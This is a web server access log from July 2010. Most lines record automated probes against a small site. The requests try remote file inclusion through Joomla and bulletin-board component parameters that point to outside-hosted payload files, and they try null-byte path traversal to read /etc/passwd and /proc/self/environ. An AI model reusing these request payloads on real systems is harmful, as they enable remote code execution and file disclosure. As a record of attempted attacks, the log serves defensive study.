79.244.87.243 - - [27/Jul/2010:00:59:02 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://itg.nrct.go.th/itg/1.txt????? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
79.244.87.243 - - [27/Jul/2010:00:59:02 -0700] "GET /logs/access.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://itg.nrct.go.th/itg/1.txt????? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
79.244.87.243 - - [27/Jul/2010:00:59:02 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://itg.nrct.go.th/itg/1.txt????? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
79.244.87.243 - - [27/Jul/2010:00:59:02 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://itg.nrct.go.th/itg/1.txt????? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
79.244.87.243 - - [27/Jul/2010:00:59:03 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://itg.nrct.go.th/itg/1.txt????? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
79.244.87.243 - - [27/Jul/2010:00:59:04 -0700] "GET /logs/access.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://itg.nrct.go.th/itg/1.txt????? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
174.142.207.53 - - [27/Jul/2010:01:03:48 -0700] "GET /bbs/write_update.php?board_skin_path=http://www.sitasa.com/upload/tablas/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
174.142.207.53 - - [27/Jul/2010:01:03:48 -0700] "GET /logs//bbs/write_update.php?board_skin_path=http://www.sitasa.com/upload/tablas/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
174.142.207.53 - - [27/Jul/2010:01:03:48 -0700] "GET /logs/access.log//bbs/write_update.php?board_skin_path=http://www.sitasa.com/upload/tablas/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
95.211.71.21 - - [27/Jul/2010:01:06:07 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
95.211.71.21 - - [27/Jul/2010:01:06:07 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
95.211.71.21 - - [27/Jul/2010:01:06:14 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
95.211.71.21 - - [27/Jul/2010:01:06:14 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
95.211.71.21 - - [27/Jul/2010:01:06:17 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
95.211.71.21 - - [27/Jul/2010:01:06:18 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
74.52.245.146 - - [27/Jul/2010:01:08:05 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0" "www.redneckmba.com"
66.163.171.205 - - [27/Jul/2010:01:09:40 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
174.142.207.53 - - [27/Jul/2010:01:16:28 -0700] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://www.sitasa.com/upload/tablas/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.114.107 - - [27/Jul/2010:01:23:05 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
88.131.106.1 - - [27/Jul/2010:01:25:12 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.redneckmba.com"
88.131.106.8 - - [27/Jul/2010:01:25:15 -0700] "GET /tmp/?D=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.redneckmba.com"
95.211.71.21 - - [27/Jul/2010:01:25:32 -0700] "GET /logs/access.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
95.211.71.21 - - [27/Jul/2010:01:25:33 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
95.211.71.21 - - [27/Jul/2010:01:25:33 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
76.13.123.195 - - [27/Jul/2010:01:25:34 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
95.211.71.21 - - [27/Jul/2010:01:25:47 -0700] "GET /logs/access.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
95.211.71.21 - - [27/Jul/2010:01:25:47 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
95.211.71.21 - - [27/Jul/2010:01:25:48 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
209.116.59.107 - - [27/Jul/2010:01:33:19 -0700] "GET /index.php?option=com_alphauserpoints&view=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
209.116.59.107 - - [27/Jul/2010:01:33:19 -0700] "GET /logs//index.php?option=com_alphauserpoints&view=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
209.116.59.107 - - [27/Jul/2010:01:33:20 -0700] "GET /logs/access.log//index.php?option=com_alphauserpoints&view=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
216.18.201.205 - - [27/Jul/2010:01:42:37 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
216.18.201.205 - - [27/Jul/2010:01:42:38 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
216.18.201.205 - - [27/Jul/2010:01:42:40 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "redneckmba.com"
213.145.228.170 - - [27/Jul/2010:01:42:40 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "redneckmba.com"
216.18.201.205 - - [27/Jul/2010:01:42:40 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "redneckmba.com"
213.145.228.170 - - [27/Jul/2010:01:42:40 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "redneckmba.com"
216.18.201.205 - - [27/Jul/2010:01:44:58 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
213.145.228.170 - - [27/Jul/2010:01:46:41 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
202.47.80.12 - - [27/Jul/2010:01:47:40 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
202.47.80.12 - - [27/Jul/2010:01:47:40 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
202.47.80.12 - - [27/Jul/2010:01:47:46 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
202.47.80.12 - - [27/Jul/2010:01:47:46 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
216.18.201.205 - - [27/Jul/2010:01:49:16 -0700] "GET /logs/access.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
216.18.201.205 - - [27/Jul/2010:01:49:16 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
216.18.201.205 - - [27/Jul/2010:01:49:16 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
66.163.171.207 - - [27/Jul/2010:01:50:25 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
213.145.228.170 - - [27/Jul/2010:01:50:52 -0700] "GET /logs/access.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
213.145.228.170 - - [27/Jul/2010:01:50:52 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
213.145.228.170 - - [27/Jul/2010:01:50:52 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
91.201.66.94 - - [27/Jul/2010:01:52:28 -0700] "GET /logs/access_100524.log HTTP/1.0" 404 - "http://dizel-generators.narod.ru" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.redneckmba.com"
91.201.66.94 - - [27/Jul/2010:01:52:28 -0700] "GET / HTTP/1.0" 200 763 "http://www.redneckmba.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.redneckmba.com"
76.13.114.107 - - [27/Jul/2010:01:54:38 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
188.72.70.56 - - [27/Jul/2010:02:02:50 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
188.72.70.56 - - [27/Jul/2010:02:02:50 -0700] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
188.72.70.56 - - [27/Jul/2010:02:02:50 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
188.72.70.56 - - [27/Jul/2010:02:03:08 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
188.72.70.56 - - [27/Jul/2010:02:03:08 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
188.72.70.56 - - [27/Jul/2010:02:03:08 -0700] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
188.165.217.175 - - [27/Jul/2010:02:08:01 -0700] "GET /logs//index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.217.175 - - [27/Jul/2010:02:08:01 -0700] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
81.93.3.182 - - [27/Jul/2010:02:08:17 -0700] "GET /logs//index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
81.93.3.182 - - [27/Jul/2010:02:08:17 -0700] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
91.121.141.186 - - [27/Jul/2010:02:08:42 -0700] "GET /logs//index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
91.121.141.186 - - [27/Jul/2010:02:08:42 -0700] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
95.211.71.21 - - [27/Jul/2010:02:11:59 -0700] "GET /logs/access_100614.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
95.211.71.21 - - [27/Jul/2010:02:12:14 -0700] "GET /logs/access_100614.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.47.80.12 - - [27/Jul/2010:02:12:16 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.47.80.12 - - [27/Jul/2010:02:12:19 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
208.64.68.228 - - [27/Jul/2010:02:14:26 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
208.64.68.228 - - [27/Jul/2010:02:14:26 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
208.64.68.228 - - [27/Jul/2010:02:14:31 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
208.64.68.228 - - [27/Jul/2010:02:14:31 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
188.165.217.175 - - [27/Jul/2010:02:14:45 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "redneckmba.com"
188.165.217.175 - - [27/Jul/2010:02:14:45 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "redneckmba.com"
188.165.217.175 - - [27/Jul/2010:02:19:17 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
208.64.68.228 - - [27/Jul/2010:02:21:06 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
208.64.68.228 - - [27/Jul/2010:02:21:06 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
76.13.123.195 - - [27/Jul/2010:02:23:12 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
83.149.110.213 - - [27/Jul/2010:02:23:49 -0700] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
83.149.110.213 - - [27/Jul/2010:02:23:49 -0700] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
67.227.197.25 - - [27/Jul/2010:02:23:51 -0700] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
67.227.197.25 - - [27/Jul/2010:02:23:51 -0700] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
67.227.197.25 - - [27/Jul/2010:02:23:57 -0700] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
67.227.197.25 - - [27/Jul/2010:02:23:57 -0700] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
67.227.197.25 - - [27/Jul/2010:02:23:57 -0700] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
67.227.197.25 - - [27/Jul/2010:02:23:58 -0700] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
83.149.110.213 - - [27/Jul/2010:02:24:01 -0700] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
83.149.110.213 - - [27/Jul/2010:02:24:01 -0700] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
67.227.197.25 - - [27/Jul/2010:02:25:01 -0700] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
67.227.197.25 - - [27/Jul/2010:02:25:02 -0700] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
92.43.201.28 - - [27/Jul/2010:02:25:37 -0700] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
92.43.201.28 - - [27/Jul/2010:02:25:37 -0700] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
92.43.201.28 - - [27/Jul/2010:02:25:54 -0700] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
92.43.201.28 - - [27/Jul/2010:02:25:54 -0700] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
92.43.201.28 - - [27/Jul/2010:02:25:56 -0700] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
92.43.201.28 - - [27/Jul/2010:02:25:56 -0700] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
92.43.201.28 - - [27/Jul/2010:02:25:56 -0700] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
92.43.201.28 - - [27/Jul/2010:02:25:56 -0700] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
